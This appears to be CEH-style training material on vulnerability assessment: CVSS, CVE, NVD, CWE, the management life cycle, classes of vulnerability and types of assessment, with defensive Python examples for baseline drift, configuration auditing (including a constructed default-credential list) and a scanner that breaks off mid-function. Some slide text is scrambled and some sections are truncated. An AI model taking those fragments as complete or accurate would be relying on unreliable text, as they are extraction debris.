Resources for Vulnerability Research
The following are some of the online websites used to perform vulnerability research:
- Microsoft Vulnerability Research (MSVR) (https://www.microsoft.com)
- Dark Reading (https://www.darkreading.com)
- SecurityTracker (https://securitytracker.com)
- Trend Micro (https://www.trendmicro.com)
- Security Magazine (https://www.securitymagazine.com)
- PenTest Magazine (https://pentestmag.com)
- SC Magazine (https://www.scmagazine.com)
- Exploit Database (https://www.exploit-db.com)
- SecurityFocus (https://www.securityfocus.com)
- Help Net Security (https://www.helpnetsecurity.com)
- HackerStorm (http://www.hackerstorm.co.uk)
- Computerworld (https://www.computerworld.com)
- WindowsSecurity (http://www.windowsecurity.com)
- D'Crypt (https://www.d-crypt.com)
What is Vulnerability Assessment?
A vulnerability assessment is an in-depth examination of the ability of a system or application, including current security procedures and controls, to withstand exploitation. It scans networks for known security weaknesses, and recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. It identifies, quantifies, and ranks possible vulnerabilities to threats in a system. Additionally, it assists security professionals in securing the network by identifying security loopholes or vulnerabilities in the current security mechanism before attackers can exploit them.
A vulnerability assessment may be used to:
- Identify weaknesses that could be exploited
- Predict the effectiveness of additional security measures in protecting information resources from attack
Typically, vulnerability-scanning tools search network segments for IP-enabled devices and enumerate systems, operating systems, and applications to identify vulnerabilities resulting from vendor negligence, system or network administration activities, or day-to-day activities. Vulnerability-scanning software scans the computer against the Common Vulnerabilities and Exposures (CVE) index and security bulletins provided by the software vendor.
Vulnerability scanners are capable of identifying the following information:
- The OS version running on computers or devices
- IP and Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports that are listening
- Applications installed on computers
- Accounts with weak passwords
- Files and folders with weak permissions
- Default services and applications that might have to be uninstalled
- Errors in the security configuration of common applications
- Computers exposed to known or publicly reported vulnerabilities
- EOL/EOS software information
- Missing patches and hotfixes
- Weak network configurations and misconfigured or risky ports
- Help to verify the inventory of all devices on the network
There are two approaches to network vulnerability scanning:
- Active Scanning: The attacker interacts directly with the target network to find vulnerabilities. Active scanning helps in simulating an attack on the target network to uncover vulnerabilities that can be exploited by the attacker.
  Example: An attacker sends probes and specially crafted requests to the target host in the network to identify vulnerabilities.
- Passive Scanning: The attacker tries to find vulnerabilities without directly interacting with the target network. The attacker identifies vulnerabilities via information exposed by systems during normal communications. Passive scanning identifies the active operating systems, applications, and ports throughout the target network, monitoring activity to determine its vulnerabilities. This approach provides information about weaknesses but does not provide a path for directly combating attacks.
  Example: An attacker guesses the operating system information, applications, and application and service versions by observing the TCP connection setup and teardown.
Attackers scan for vulnerabilities using tools such as Nessus, Qualys, GFI LanGuard, and OpenVAS. Vulnerability scanning enables an attacker to identify network vulnerabilities, open ports and running services, application and services configuration errors, and application and service vulnerabilities.
Limitations of Vulnerability Assessment
The following are some of the limitations of vulnerability assessments:
- Vulnerability-scanning software is limited in its ability to detect vulnerabilities at a given point in time
- Vulnerability-scanning software must be updated when new vulnerabilities are discovered or when improvements are made to the software being used
- Software is only as effective as the maintenance performed on it by the software vendor and by the administrator who uses it
- Vulnerability assessment does not measure the strength of security controls
- Vulnerability-scanning software itself is not immune to software engineering flaws that might lead to it missing serious vulnerabilities
- Human judgment is needed to analyze the data after scanning and identifying the false positives and false negatives
The methodology used might have an impact on the test results. For example, vulnerability scanning software that runs under the security context of the domain administrator will yield different results than software that runs under the security context of an authenticated or non-authenticated user. Similarly, diverse vulnerability-scanning software packages assess security differently and have unique features. This can influence the assessment results.
Vulnerability Scoring Systems and Databases
Common Vulnerabilities and Exposures (CVE): A publicly available and free-to-use list or dictionary of standardized identifiers for common software vulnerabilities and exposures.
National Vulnerability Database (NVD): A U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP). These data enable automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security-related software flaws, misconfigurations, product names, and impact metrics.
Common Weakness Enumeration (CWE): A category system for software vulnerabilities and weaknesses. It is sponsored by the National Cybersecurity FFRDC, which is owned by The MITRE Corporation, with support from US-CERT and the National Cyber Security Division of the U.S. Department of Homeland Security. It has over 600 categories of weaknesses, which gives the community a baseline for weakness identification, mitigation, and prevention efforts.
Vulnerability Scoring Systems and Databases
Due to the growing severity of cyber-attacks, vulnerability research has become critical as it helps to mitigate the chance of attacks. Vulnerability research provides awareness of advanced techniques to identify flaws or loopholes in the software that can be exploited by attackers. Vulnerability scoring systems and vulnerability databases are used by security analysts to rank information system vulnerabilities and to provide a composite score of the overall severity and risk associated with identified vulnerabilities. Vulnerability databases collect and maintain information about various vulnerabilities present in information systems.
Following are some of the vulnerability scoring systems and databases:
= Common Vulnerability Scoring System (CVSS)
= Common Vulnerabilities and Exposures (CVE)
= National Vulnerability Database (NVD)
= Common Weakness Enumeration (CWE)
Common Vulnerability Scoring System (CVSS)
Source: https://www.first.org, https://nvd.nist.gov
CVSS is a published standard that provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. The system's quantitative model ensures repeatable, accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the scores. Thus, CVSS is well suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability impact scores. Two common uses of CVSS are prioritizing vulnerability remediation activities and calculating the severity of vulnerabilities discovered on one's systems. The National Vulnerability Database (NVD) provides CVSS scores for almost all known vulnerabilities.
CVSS helps capture the principal characteristics of a vulnerability and produce a numerical score to reflect its severity. This numerical score can thereafter be translated into a qualitative representation (such as low, medium, high, or critical) to help organizations properly assess and prioritize their vulnerability management processes. CVSS assessment consists of three metrics for measuring vulnerabilities:
= Base Metric: Represents the inherent qualities of a vulnerability
= Temporal Metric: Represents the features that continue to change during the lifetime of the vulnerability
= Environmental Metric: Represents vulnerabilities that are based on a particular environment or implementation
Each metric sets a score from 1-10, with 10 being the most severe. The CVSS score is calculated and generated by a vector string, which represents the numerical score for each group in the form of a block of text. The CVSS calculator ranks the security vulnerabilities and provides the user with information on the overall severity and risk related to the vulnerability.
Severity        Base Score Range
None            0.0
Low             0.1-3.9
Medium          4.0-6.9
High            7.0-8.9
Critical        9.0-10.0
Table 5.3: CVSS v3.0 ratings
Severity        Base Score Range
Low             0.0-3.9
Medium          4.0-6.9
High            7.0-10
Table 5.2: CVSS v2.0 ratings
Figure: Screenshot of the Common Vulnerability Scoring System calculator (Exploitability Metrics for CVE-2017-0144)
Common Vulnerabilities and Exposures (CVE)
CVE IDs are assigned by CVE Numbering Authorities (CNAs) from around the world, which ensures confidence among parties when discussing or sharing information about a unique software or firmware vulnerability. CVE provides a baseline for tool evaluation and enables data exchange for cybersecurity automation. CVE IDs provide a baseline for evaluating services so that users can determine their organization's needs. In short, products and services that include CVE gain interoperability and better security coverage.
What CVE is:
= One identifier for one vulnerability or exposure
= One standardized description for each vulnerability or exposure
= A dictionary rather than a database
= A method for disparate databases and tools to "speak" the same language
= The way to interoperability and better security coverage
= A basis for evaluation among services, tools, and databases
= Free for the public to download and use
= Industry-endorsed via the CVE Numbering Authorities, CVE Board, and the numerous products and services that include CVE
Figure: Screenshot of CVE search results
National Vulnerability Database (NVD)
Source: https://nvd.nist.gov
The NVD is the U.S. government repository of standards-based vulnerability management data. It uses the Security Content Automation Protocol (SCAP). Such data enable the automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.
The NVD performs an analysis on CVEs that have been published to the CVE Dictionary. NVD staff are tasked with the analysis of CVEs by aggregating data points from the description, references supplied, and any supplemental data that are publicly available. This analysis results in association impact metrics (Common Vulnerability Scoring System, CVSS), vulnerability types (Common Weakness Enumeration, CWE), …
Figure 5.3: Screenshot showing CVE details in the National Vulnerability Database (NVD)
Common Weakness Enumeration (CWE)
Source: https://cwe.mitre.org
Common Weakness Enumeration (CWE) is a category system for software vulnerabilities and weaknesses. It is sponsored by the National Cybersecurity FFRDC, which is owned by The MITRE Corporation, with support from US-CERT and the National Cyber Security Division of the U.S. Department of Homeland Security. The latest version 3.2 of the CWE standard was released in January 2019. It has over 600 categories of weaknesses, which gives CWE the ability to be effectively employed by the community as a baseline for weakness identification, mitigation, and prevention efforts. It also has an advanced search technique where attackers can search and view weaknesses based on research concepts, development concepts, and architectural concepts.
Figure 5.4: Screenshot showing CWE results for SMB query
Vulnerability-Management Life Cycle (figure): Baseline, Vulnerability Scan, Risk Assessment, Remediation, Verification
Vulnerability-Management Life Cycle
The vulnerability management life cycle is an important process that helps identify and remediate security weaknesses before they can be exploited. This includes defining the risk posture and policies for an organization, creating a complete asset list of systems, scanning and assessing the environment for vulnerabilities and exposures, and taking action to mitigate vulnerabilities that are identified. The implementation of a vulnerability management lifecycle helps gain a strategic perspective regarding possible cybersecurity threats and renders insecure computing environments more resilient to attacks.
Vulnerability management should be implemented in every organization as it evaluates and controls the risks and vulnerabilities in the system. The management process continuously examines the IT environments for vulnerabilities and risks associated with the system. Organizations should maintain a proper vulnerability management program to ensure overall information security. Vulnerability management provides the best results when it is implemented in a sequence of well-organized phases.
The phases involved in vulnerability management are:
= Identify Assets and Create a Baseline
This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration of each system in order to develop and maintain a system baseline.
= Vulnerability Scan
This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organization's infrastructure. Vulnerability scans can also be performed on applicable compliance templates to assess the organization's infrastructure weaknesses against the respective compliance guidelines.
= Risk Assessment
In this phase, all serious uncertainties that are associated with the system are assessed and remediation is planned and prioritized, to permanently eliminate system flaws. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. It determines whether the risk level for a particular asset is high, moderate, or low. Remediation is planned based on the determined risk level. For example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization.
= Remediation
Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps.
= Verification
Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly.
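An added example, not EC-Council courseware code, of how the baseline from the first phase feeds the scan and risk-assessment phases above: a per-host baseline of approved ports and software versions is compared with the inventory from a later scan, and every deviation is reported as a finding. The host names, ports, and version numbers are all constructed.

```python
"""Baseline drift check for the 'Identify Assets and Create a Baseline' and
'Vulnerability Scan' phases above.

Added example, not EC-Council courseware code. The approved baseline, the later
scan inventory, and the host names are all constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    kind: str    # unknown-host | unapproved-port | unapproved-software | version-drift
    detail: str


# Constructed baseline: approved open TCP ports and software versions per host.
BASELINE = {
    "web01.example.test": {"ports": {22, 443},
                           "software": {"nginx": "1.18.0", "openssh": "8.2p1"}},
    "db01.example.test": {"ports": {22, 5432},
                          "software": {"postgresql": "12.7", "openssh": "8.2p1"}},
}

# Constructed inventory from a later scan; the deviations are deliberate.
OBSERVED = {
    "web01.example.test": {"ports": {22, 80, 443, 8080},
                           "software": {"nginx": "1.18.0", "openssh": "8.2p1", "telnetd": "0.17"}},
    "db01.example.test": {"ports": {22, 5432},
                          "software": {"postgresql": "12.4", "openssh": "8.2p1"}},
    "lab99.example.test": {"ports": {3389}, "software": {}},   # never baselined
}


def compare(baseline: dict, observed: dict) -> list:
    """Return every deviation of the observed inventory from the approved baseline."""
    findings = []
    for host, current in observed.items():
        approved = baseline.get(host)
        if approved is None:
            findings.append(Finding(host, "unknown-host", "host is not in the asset baseline"))
            continue
        for port in sorted(current["ports"] - approved["ports"]):
            findings.append(Finding(host, "unapproved-port", f"tcp/{port} open but not approved"))
        for name, version in sorted(current["software"].items()):
            expected = approved["software"].get(name)
            if expected is None:
                findings.append(Finding(host, "unapproved-software", f"{name} {version} not in baseline"))
            elif version != expected:
                findings.append(Finding(host, "version-drift",
                                        f"{name} {version} differs from approved {expected}"))
    return findings


def summarize(findings: list) -> dict:
    """Count findings per kind, the figure a risk-assessment step would start from."""
    counts = {}
    for finding in findings:
        counts[finding.kind] = counts.get(finding.kind, 0) + 1
    return counts


if __name__ == "__main__":
    for f in compare(BASELINE, OBSERVED):
        print(f"{f.host:22} {f.kind:20} {f.detail}")
    print(summarize(compare(BASELINE, OBSERVED)))
```

A host that is absent from the baseline is reported before anything else about it, because an unbaselined asset cannot be scanned against approved settings at all; it has to go back to the identification phase first.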
Pre-Assessment Phase (slide): Identify Assets and Create a Baseline
Pre-Assessment Phase: Identify Assets and Create a Baseline
The pre-assessment phase is a preparatory phase, which involves defining policies and standards, clarifying the scope of the assessment, designing appropriate information protection procedures, and identifying and prioritizing critical assets to create a good baseline for vulnerability management. The following are the steps involved in creating a baseline:
1. Identify and understand business processes
2. Identify the applications, data, and services that support the business processes and perform code reviews
3. Identify the approved software, drivers, and basic configuration of each system
4. Create an inventory of all assets, and prioritize or rank the critical assets
5. Understand policy implementation and practice standard compliance with business processes
6. Define the scope of the assessment
7. Create information protection procedures to support effective planning, scheduling, coordination, and logistics
Classify the identified assets according to the business needs. Classification helps to identify the high business risks in an organization. Prioritize the rated assets based on the impact of their failure and their reliability in the business. Prioritization helps:
= Evaluate and decide a solution for the risk
= Examine the level of tolerance for the consequence of the assets failing
= Organize methods for prioritizing the assets
Vulnerability Assessment Phase (slide): examine and evaluate the physical security; identify and prioritize vulnerabilities
Vulnerability Assessment Phase
The vulnerability assessment phase refers to identifying vulnerabilities in the organization's infrastructure, including the operating system, web applications, and web server. It helps identify the category of the vulnerability and criticality in an organization and minimizes the level of risk. The ultimate goal of vulnerability scanning is to scan, examine, evaluate, and report the vulnerabilities in the organization's information system.
The assessment phase involves examining the architecture of the network, evaluating threats to the environment, performing penetration testing, examining and evaluating physical security, analyzing physical assets, assessing operational security, observing policies and procedures, and assessing the infrastructure's interdependencies.
Steps involved in the assessment phase:
= Examine and evaluate the physical security
= Check for misconfigurations and human errors
= Run vulnerability scans using tools
= Select the type of scan based on the organization or compliance requirements
= Identify and prioritize vulnerabilities
= Identify false positives and false negatives
= Apply the business and technology context to scanner results
= Perform OSINT information gathering to validate the vulnerabilities
= Create a vulnerability scan report
Post-Assessment Phase (slide): Risk Assessment
Post-Assessment Phase
The post-assessment phase, also known as the recommendation phase, is performed after and based on risk assessment. Risk characterization is categorized by key criteria, which helps prioritize the list of recommendations. The tasks performed in the post-assessment phase include:
= Creating a priority list for assessment recommendations based on the impact analysis
= Developing an action plan to implement the proposed remediation
= Capturing lessons learned to improve the complete process in the future
= Conducting training for employees
Post assessment includes risk assessment, remediation, verification, and monitoring.
= Risk Assessment
In the risk assessment phase, risks are identified, characterized, and classified along with the techniques used to control or reduce their impact. It is an important step toward identifying security weaknesses in the IT architecture of an organization. The tasks performed in the risk assessment phase include:
o Perform risk categorization based on risk ranking (for example, critical, high, medium, and low)
o Assess the level of impact
o Determine the threat and risk levels
= Remediation
Remediation refers to the steps taken to mitigate the identified vulnerabilities. These include steps like evaluating vulnerabilities, locating risks, and designing responses for vulnerabilities. It is important for the remediation process to be specific, measurable, attainable, relevant, and time-bound. The tasks performed in the remediation phase include:
o Prioritizing remediation based on the risk ranking
o Performing dynamic analysis
o Reviewing the attack surface
= Monitoring
This phase performs incident monitoring using tools such as IDS/IPS, SIEM, and firewall. It implements continuous security monitoring to thwart ever-evolving threats. The tasks performed in the monitoring phase include:
o Periodic vulnerability scan and assessment
o Timely remediation of identified vulnerabilities
o Monitoring intrusion detection and intrusion prevention logs
o Implementing policies, procedures, and controls
Module Flow: Vulnerability Classification and Assessment Types; Vulnerability Assessment Reports
Vulnerability Classification (slide): Misconfiguration, Default Installations, Buffer Overflows, Unpatched Servers, Design Flaws, Operating System Flaws, Application Flaws, Open Services, Default Passwords
Vulnerability Classification
Vulnerabilities present in a system or network are classified into the following categories:
= Misconfiguration
Misconfiguration is the most common vulnerability and is mainly caused by human error, which allows attackers to gain unauthorized access to the system. It may happen intentionally or unintentionally and affects web servers, application platforms, databases, and networks. The following are some examples of misconfiguration:
o An application running with debug enabled
o Unnecessary administrative ports that are open for an application
o Running outdated software on the system
o Using misconfigured SSL certificates or default certificates
o Improperly authenticated external systems
o Incorrect folder permissions
o Default accounts or passwords
o Setup or configuration pages enabled
o Disabling security settings and features
Attackers can easily detect these misconfigurations using scanning tools and then exploit the backend systems. Therefore, the administrators must change the default configuration of devices and optimize device security.
= Default Installations
Default installations are usually user-friendly, especially when the device is being used …
= Buffer Overflows
… buffer overflow occurs.
= Unpatched Servers
Servers are an essential component of the infrastructure of any organization. There are several cases where organizations run unpatched and misconfigured servers that compromise the security and integrity of the data in their system. Hackers look out for these vulnerabilities in the servers and exploit them. As these unpatched servers are a hub for the attackers, they serve as an entry point into the network. This can lead to the exposure of private data, financial loss, and discontinuation of operations. Updating and maintaining systems properly by patching software regularly and fixing bugs can help in mitigating the vulnerabilities caused by unpatched servers.
= Design Flaws
Vulnerabilities due to design flaws are universal to all operating devices and systems. Design vulnerabilities such as incorrect encryption or the poor validation of data refer to logical flaws in the functionality of the system that attackers exploit to bypass the detection mechanism and acquire access to a secure system.
= Operating System Flaws
Due to vulnerabilities in the operating systems, applications such as trojans, worms, and viruses pose threats. These attacks use malicious code, script, or unwanted software, which results in the loss of sensitive information and control of computer operations. Timely patching of the OS, installing minimal software applications, and using applications with firewall capabilities are essential steps that an administrator must take to protect the OS from attacks.
= Application Flaws
Application flaws are vulnerabilities in applications that are exploited by the attackers. Applications should be secured using the validation and authorization of the user. Flawed applications pose security threats such as data tampering and unauthorized access to configuration stores. If the applications are not secured, sensitive information may be lost or corrupted. Hence, developers must understand the anatomy of common security vulnerabilities and develop highly secure applications by providing proper user validation and authorization.
= Open Services
Open ports and services may lead to the loss of data or DoS attacks and allow attackers to perform further attacks on other connected devices. Administrators must continuously check for unnecessary or insecure ports and services to reduce the risk to the network.
= Default Passwords
Manufacturers provide users with default passwords to access the device during its initial set-up, which users must change for future use. When users forget to update the passwords and continue using the default passwords, they make devices and systems vulnerable to various attacks, such as brute force and dictionary attacks. Attackers exploit this vulnerability to obtain access to the system. Passwords should be kept confidential; failing to protect the confidentiality of a password allows the system to be easily compromised.
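Added example, not from the courseware: a small audit routine that checks an appliance configuration for several of the misconfigurations listed in this section (debug mode, an administrative port exposed on all interfaces, a default or self-signed certificate, disabled TLS verification, and default accounts or passwords). The INI-style configuration, its option names, and the default-credential list are constructed for illustration.

```python
"""Configuration audit for the misconfiguration examples listed above.

Added example, not EC-Council courseware code. The INI-style appliance
configuration, the option names, and the default-credential list are constructed.
"""
import configparser

# Constructed configuration written to contain several of the listed misconfigurations.
SAMPLE_CONFIG = """
[app]
debug = true
setup_page_enabled = yes
admin_port = 8443
admin_port_bind = 0.0.0.0

[tls]
certificate = /etc/appliance/default-selfsigned.pem
verify_peer = false

[accounts]
admin = admin
guest = guest
"""

# Constructed vendor default credentials as (user, password) pairs.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("guest", "guest"), ("root", "toor")}


def audit(config_text: str) -> list:
    """Return a list of misconfiguration findings for an INI-style configuration."""
    cfg = configparser.ConfigParser()
    cfg.read_string(config_text)
    findings = []
    # Application running with debug enabled
    if cfg.getboolean("app", "debug", fallback=False):
        findings.append("debug mode enabled")
    # Setup or configuration pages enabled
    if cfg.getboolean("app", "setup_page_enabled", fallback=False):
        findings.append("setup/configuration page enabled")
    # Unnecessary administrative port reachable from every interface
    if cfg.get("app", "admin_port_bind", fallback="127.0.0.1") == "0.0.0.0":
        findings.append("administrative port bound to all interfaces")
    # Misconfigured or default certificates; disabled security settings
    certificate = cfg.get("tls", "certificate", fallback="")
    if "default" in certificate or "selfsigned" in certificate:
        findings.append("default or self-signed TLS certificate in use")
    if not cfg.getboolean("tls", "verify_peer", fallback=True):
        findings.append("TLS peer verification disabled")
    # Default accounts or passwords
    if cfg.has_section("accounts"):
        for user, password in cfg.items("accounts"):
            if (user, password) in DEFAULT_CREDENTIALS:
                findings.append(f"default credential for account '{user}'")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_CONFIG):
        print("FINDING:", line)
```

The fallbacks are chosen so that a missing option is treated as the safe setting; a real audit would instead report a missing security option as its own finding, since an absent setting usually means the vendor default applies.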
Types of Vulnerability Assessment (slides): Active, Passive, Application, Database, Wireless Network, Distributed, Credentialed, Non-Credentialed, Manual, and Automated Assessment
Types of Vulnerability Assessment
Given below are the different types of vulnerability assessments:
= Active Assessment
A type of vulnerability assessment that uses network scanners to identify the hosts, services, and vulnerabilities present in a network. Active network scanners can reduce the intrusiveness of the checks they perform.
= Passive Assessment
Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.
= External Assessment
o Evaluate the physical security
o Identify and review the remote management process and events
o Assess the file-sharing mechanisms (for example, NFS and SMB/CIFS shares)
o Examine the antivirus implementation and events
= Host-Based Assessment
Host-based assessments are a type of security check that involve conducting a configuration-level check to identify system configurations, user directories, file systems, registry settings, and other parameters to evaluate the possibility of compromise. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Host-based assessments use many commercial and open-source scanning tools.
= Network-Based Assessment
Network assessments determine the possible network security attacks that may occur on an organization's system. These assessments discover network resources and map the ports and services running to various areas on the network. It evaluates the organization's system for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Network assessment professionals use firewalls and network scanners, such as Nessus. These scanners identify open ports, recognize the services running on those ports, and detect vulnerabilities associated with these services. These assessments help organizations identify points of entry and attack into a network since they follow the path and approach of the hacker. They help organizations determine how systems are vulnerable to Internet and intranet attacks, and how an attacker can gain access to important information. A typical network assessment conducts the following tests on a network:
o Checks the network topologies and router filtering rules
o Examines the network for inappropriate firewall configuration
o Identifies inappropriately configured database servers
o Tests individual services and protocols such as HTTP, SNMP, and FTP
o Reviews HTML source code for unnecessary information
o Performs bounds checking on variables
= Application Assessment
An application assessment focuses on transactional Web applications, traditional client-server applications, and hybrid systems. It analyzes all elements of an application infrastructure, including deployment and communication within the client and server. This type of assessment tests the web server infrastructure for any misconfiguration, outdated content, or known vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments.
= Database Assessment
A database assessment is any assessment focused on testing the databases for the presence of any misconfiguration or known vulnerabilities. These assessments mainly concentrate on testing various database technologies like MYSQL, MSSQL, ORACLE, and POSTGRESQL to identify data exposure or injection type vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments.
= Wireless Network Assessment
Wireless network assessment determines the vulnerabilities in an organization's wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization's perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.
= Distributed Assessment
This type of assessment, employed by organizations that possess assets like servers and clients at different locations, involves simultaneously assessing the distributed organization assets, such as client and server applications, using appropriate synchronization techniques. Synchronization plays a critical role in this type of assessment. By synchronizing the test runs together, all the separate assets situated at multiple locations can be tested at the same time.
= Credentialed Assessment
Credentialed assessment is also called authenticated assessment. In this type of assessment, the ethical hacker possesses the credentials of all machines present in the assessed network. The chances of finding vulnerabilities related to operating systems and applications are higher in credentialed assessment than in non-credentialed assessment. This type of assessment is challenging since it is highly unclear who owns particular assets in large enterprises, and even when the ethical hacker identifies the actual owners of the assets, accessing the credentials of these assets is highly tricky since the asset owners generally do not share such confidential information. Also, even if the ethical hacker successfully acquires all required credentials, maintaining the password list is a huge task since there can be issues with things like changed passwords, typing errors, and administrative privileges. Although it is the best way of assessing a target enterprise network for vulnerabilities and is highly reliable, it is a complex assessment that is challenging.
= Non-Credentialed Assessment
Non-credentialed assessment, also called unauthenticated assessment, provides a quick overview of weaknesses by analyzing the network services that are exposed by the host. Since it is a non-credentialed assessment, an ethical hacker does not require any credentials for the assets to perform their assessments. This type of assessment generates a brief report regarding vulnerabilities; however, it is not reliable because it does not provide deeper insight into the OS and application vulnerabilities that are not exposed by the host to the network. This assessment is also incapable of detecting the vulnerabilities that are potentially covered by firewalls. It is prone to false-positive outputs and is not reliably effective as compared to credential-based assessment.
= Manual Assessment
After performing footprinting and network scanning and obtaining crucial information, if the ethical hacker performs manual research for exploring the vulnerabilities or weaknesses, they manually rank the vulnerabilities and score them by referring to vulnerability scoring standards like CVSS and vulnerability databases like CVE and CWE. Such assessment is considered to be manual.
= Automated Assessment
Module Flow: Vulnerability Classification and Assessment Types; Vulnerability Assessment Reports
Vulnerability Assessment Solutions and Tools
Vulnerability assessment solutions are important tools for information security management as they identify all potential security weaknesses before an attacker can exploit them. There are different approaches and solutions available to perform a vulnerability assessment. Selecting an appropriate assessment approach plays a major role in mitigating the threats that an organization faces. This section outlines the various approaches, solutions, and tools used to perform a vulnerability assessment.
Comparing Approaches to Vulnerability Assessment (slide): Product-Based Solutions versus Service-Based Solutions
Comparing Approaches to Vulnerability Assessment (Cont'd) (slide): Tree-Based Assessment versus Inference-Based Assessment
Comparing Approaches to Vulnerability Assessment
There are four types of vulnerability assessment solutions: product-based solutions, service-based solutions, tree-based assessment, and inference-based assessment.
= Product-Based Solutions
Product-based solutions are installed in the organization's internal network. They are installed either on a private or non-routable space or in the Internet-addressable portion of an organization's network. If they are installed on a private network (behind the firewall), they cannot always detect outside attacks.
= Service-Based Solutions
Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network, while others are hosted outside the network. A drawback of this solution is that attackers can audit the network from the outside.
= Tree-Based Assessment
In a tree-based assessment, the auditor selects different strategies for each machine or component of the information system. For example, the administrator selects a scanner for servers running Windows, databases, and web services but uses a different scanner for Linux servers. This approach relies on the administrator to provide a starting piece of intelligence, and then to start scanning continuously without incorporating any information found at the time of scanning.
= Inference-Based Assessment
In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.
Characteristics of a Good Vulnerability Assessment Solution (slide)
Characteristics of a Good Vulnerability Assessment Solution
Organizations need to select a proper and suitable vulnerability assessment solution to detect, assess, and protect their critical IT assets from various internal and external threats. The characteristics of a good vulnerability assessment solution are as follows:
= Ensures correct outcomes by testing the network, network resources, ports, protocols, and operating systems
= Uses a well-organized inference-based approach for testing
= Automatically scans and checks against continuously updated databases
= Creates brief, actionable, customizable reports, including reports of vulnerabilities by severity level, and trend analysis
= Supports multiple networks
= Suggests appropriate remedies and workarounds to correct vulnerabilities
= Imitates the outside view of attackers to gain its objective
of Vulnerability
Working Solutions
Scanning
a nd
Sarvies
>|
Findings
andRecommendations
of Vulnerability
Working Solutions
Scanning
Any organization needs to handle and process large volumes of data to conduct business. These large volumes of data contain privileged information of that particular organization. Attackers try to identify vulnerabilities that they can exploit, and then use these to gain access to critical data for illegal purposes. Vulnerability analysis analyzes and detects risk-prone areas in the organizational network. This analysis uses various tools and reports on the vulnerabilities present in the network.
Figure 5.5: The working of vulnerability scanning solutions (diagram: Terms of Reference, Perform Service and OS Discovery, Test Services and OS for Known Vulnerabilities, Findings and Recommendations)
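As an added example, not code from the original text or from any product it describes, the following Python sketches the inference-based flow shown in Figure 5.5: infer the protocol from each banner, identify the product and version, then schedule and run only the checks relevant to the protocols actually found. The hosts, banners, products, version thresholds and VULN-xxx identifiers are all constructed placeholders, not real CVE entries.

```python
"""Inference-based vulnerability scan, simplified (added example, not EC-Council code).

Flow, as in Figure 5.5: infer the protocol from each banner, identify the product
and version, then select and run only the checks relevant to what was found.
Hosts, banners, products, version thresholds and VULN-xxx IDs are constructed
placeholders, not real CVE entries.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Service:
    host: str
    port: int
    protocol: str
    product: str
    version: Tuple[int, ...]


@dataclass
class Check:
    vuln_id: str
    protocol: str
    product: str
    fixed_in: Tuple[int, ...]   # versions below this are flagged
    title: str


# Constructed signature database (hypothetical IDs and thresholds).
CHECKS = [
    Check("VULN-001", "http",  "Apache",  (2, 4, 41), "Apache httpd older than 2.4.41"),
    Check("VULN-002", "smtp",  "Postfix", (3, 3, 0),  "Postfix older than 3.3.0"),
    Check("VULN-003", "mysql", "MySQL",   (5, 7, 30), "MySQL older than 5.7.30"),
    Check("VULN-004", "ftp",   "vsftpd",  (3, 0, 3),  "vsftpd older than 3.0.3"),
]

# Protocol-specific version parsers: (regex, fixed product name or None when the
# regex captures the product itself).
VERSION_PARSERS = {
    "http":  (re.compile(r"Server:\s*([A-Za-z-]+)/(\d+(?:\.\d+)+)"), None),
    "smtp":  (re.compile(r"ESMTP\s+([A-Za-z]+)\s+(\d+(?:\.\d+)+)"), None),
    "ssh":   (re.compile(r"OpenSSH_(\d+(?:\.\d+)+)"), "OpenSSH"),
    "mysql": (re.compile(r"(\d+(?:\.\d+)+)"), "MySQL"),
}


def infer_protocol(banner: str) -> Optional[str]:
    """Step 1: build the protocol inventory from what the port actually speaks."""
    if banner.startswith("HTTP/"):
        return "http"
    if banner.startswith("SSH-"):
        return "ssh"
    if banner.startswith("220 ") and "SMTP" in banner.upper():
        return "smtp"
    if "mysql_native_password" in banner:
        return "mysql"
    return None


def parse_version(text: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in text.split("."))


def build_inventory(banners: List[Tuple[str, int, str]]) -> List[Service]:
    """Step 2: attach a product and version to every recognised protocol."""
    services = []
    for host, port, banner in banners:
        proto = infer_protocol(banner)
        if proto is None:
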